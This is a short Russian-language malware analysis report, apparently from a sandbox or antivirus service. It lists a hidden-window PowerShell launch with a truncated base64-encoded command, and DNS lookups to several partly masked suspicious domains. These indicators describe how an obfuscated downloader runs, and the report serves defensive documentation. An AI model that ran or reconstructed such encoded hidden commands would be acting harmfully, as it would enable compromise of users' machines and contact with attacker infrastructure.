Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABNAGEAcwBzAGEAYwBoAHUAcwBlAHQAdABzAG8AagB6AD0AJwBFAHIAZwBvAG4AbwBtAGkAYwBmAHAAbAAnADsAJABkAGUAcAB...
- DNS ASK di###dilan.com
- DNS ASK cu#####ontheroadspr.com
- DNS ASK pr######man-cambodia.com
- DNS ASK xm##zd.com
- DNS ASK cr#####nhappened.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABNAGEAcwBzAGEAYwBoAHUAcwBlAHQAdABzAG8AagB6AD0AJwBFAHIAZwBvAG4AbwBtAGkAYwBmAHAAbAAnADsAJABkAGUAcAB...' (со скрытым окном)